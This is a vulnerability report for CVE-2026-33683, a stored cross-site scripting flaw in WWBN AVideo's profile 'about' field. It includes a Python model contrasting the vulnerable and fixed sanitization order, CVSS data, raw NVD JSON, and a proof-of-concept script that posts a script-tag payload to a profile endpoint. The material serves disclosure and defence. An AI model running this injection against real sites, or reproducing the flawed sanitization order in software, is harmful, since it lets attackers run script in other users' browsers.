Security Vulnerability Report
CVE-2026-33683 CVSS 5.4 MEDIUM

CVE-2026-33683

Published: 2026-03-23 19:16:42
Last Modified: 2026-03-25 18:04:29

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, a sanitization order-of-operations flaw in the user profile "about" field allows any registered user to inject arbitrary JavaScript that executes when other users visit their channel page. The `xss_esc()` function entity-encodes input before `strip_specific_tags()` can match dangerous HTML tags, and `html_entity_decode()` on output reverses the encoding, restoring the raw malicious HTML. Commit 7cfdc380dae1e56bbb5de581470d9e9957445df0 contains a patch.
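The bug is entirely about the order of three steps: entity-encode, strip denylisted tags, decode on output. The following Python model, added here and not taken from AVideo's code base, reproduces that ordering with stand-ins for the three functions named in the description. The function names mirror the advisory, but their bodies, the DANGEROUS_TAGS denylist and the sample inputs are all constructed for illustration; the real PHP implementation may differ in details. The example runs the same payload through the vulnerable order (encode, then strip, then decode) and the corrected order (strip, then encode, then decode) so the difference is visible in the returned strings.

```python
import html
import re

# Constructed model of the ordering bug. The names mirror the advisory; the
# bodies are illustrative stand-ins, not AVideo's implementation.
DANGEROUS_TAGS = ("script", "iframe", "object", "embed")  # assumed denylist


def xss_esc(text: str) -> str:
    """Entity-encode < > & " ' (models the encoding step)."""
    return html.escape(text, quote=True)


def strip_specific_tags(text: str) -> str:
    """Remove denylisted tags by matching literal '<tag' markup.

    This only works on raw HTML: once '<' has become '&lt;' nothing matches,
    which is exactly what happens when it runs after xss_esc().
    """
    for tag in DANGEROUS_TAGS:
        # Drop the element together with its body (e.g. the script source)...
        text = re.sub(rf"<{tag}\b[^>]*>.*?</{tag}\s*>", "", text, flags=re.I | re.S)
        # ...and any unmatched opening or closing tag that is left over.
        text = re.sub(rf"</?{tag}\b[^>]*>", "", text, flags=re.I)
    return text


def render(stored: str) -> str:
    """Output step shared by both flows: decode entities so allowed markup shows.

    Models html_entity_decode(); it undoes whatever xss_esc() did.
    """
    return html.unescape(stored)


def vulnerable_pipeline(about: str) -> str:
    # Bug: encode first, so strip_specific_tags() sees '&lt;script&gt;' and
    # removes nothing; render() then decodes the entities back to raw markup.
    stored = strip_specific_tags(xss_esc(about))
    return render(stored)


def fixed_pipeline(about: str) -> str:
    # Strip on the raw input first, then encode what survives.
    stored = xss_esc(strip_specific_tags(about))
    return render(stored)


def has_script_tag(rendered_html: str) -> bool:
    """Crude check used only to make the result of each flow explicit."""
    return re.search(r"<script\b", rendered_html, re.I) is not None


PAYLOAD = '<script>alert("CVE-2026-33683_XSS");</script>'  # constructed sample input
BENIGN = "Cats <b>and</b> dogs & more"                      # constructed sample input

if __name__ == "__main__":
    print("vulnerable:", vulnerable_pipeline(PAYLOAD))
    print("fixed     :", repr(fixed_pipeline(PAYLOAD)))
    print("benign    :", fixed_pipeline(BENIGN))
```

Run as-is, the vulnerable flow returns the payload byte-for-byte unchanged, because the encoded form `&lt;script&gt;` never matches the tag pattern and the decode on output restores it. Reordering so the stripper sees raw input fixes this specific case while leaving benign markup untouched. Note that a denylist stripper followed by an output decode is still a fragile design in general: anything the denylist does not cover is decoded back to live HTML, so an allowlist-based sanitizer is the more robust long-term choice.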

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-33683
# This script demonstrates how to inject a payload into the 'about' field.
# The endpoint path, form field name and channel URL below are the PoC's own
# placeholders; confirm them against the target before relying on the output.
import requests


def exploit(target_url, session_cookie):
    # The vulnerable endpoint is the user profile update
    update_url = f"{target_url}/user/profile"

    # Payload to be injected in the 'about' field
    # Due to the sanitization flaw, this script tag will be stored and executed
    payload = '<script>alert("CVE-2026-33683_XSS");</script>'

    # Authenticate as any registered user (low privileges are sufficient)
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }
    data = {
        "about": payload
    }

    try:
        response = requests.post(update_url, headers=headers, data=data, timeout=10)
        if response.status_code == 200:
            # A 200 only shows the request was accepted; verify by loading the
            # channel page and checking that the raw <script> tag is present.
            print("[+] Payload injected successfully.")
            print(f"[+] Visit the user channel at: {target_url}/channel/attacker_user")
        else:
            print(f"[-] Failed to inject payload. Status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


# Example usage
# exploit("http://localhost", "valid_session_id")
```

References

https://github.com/WWBN/AVideo/commit/7cfdc380dae1e56bbb5de581470d9e9957445df0 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-ghx5-7jjg-q2j7 (Exploit, Vendor Advisory)

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33683",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T19:16:41.707",
    "lastModified": "2026-03-25T18:04:29.087",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, a sanitization order-of-operations flaw in the user profile \"about\" field allows any registered user to inject arbitrary JavaScript that executes when other users visit their channel page. The `xss_esc()` function entity-encodes input before `strip_specific_tags()` can match dangerous HTML tags, and `html_entity_decode()` on output reverses the encoding, restoring the raw malicious HTML. Commit 7cfdc380dae1e56bbb5de581470d9e9957445df0 contains a patch."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, una falla en el orden de operaciones de sanitización en el campo 'acerca de' del perfil de usuario permite a cualquier usuario registrado inyectar JavaScript arbitrario que se ejecuta cuando otros usuarios visitan su página de canal. La función `xss_esc()` codifica entidades la entrada antes de que `strip_specific_tags()` pueda coincidir con etiquetas HTML peligrosas, y `html_entity_decode()` en la salida revierte la codificación, restaurando el HTML malicioso en bruto. El commit 7cfdc380dae1e56bbb5de581470d9e9957445df0 contiene un parche."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "26.0",
                "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/7cfdc380dae1e56bbb5de581470d9e9957445df0",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ghx5-7jjg-q2j7",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```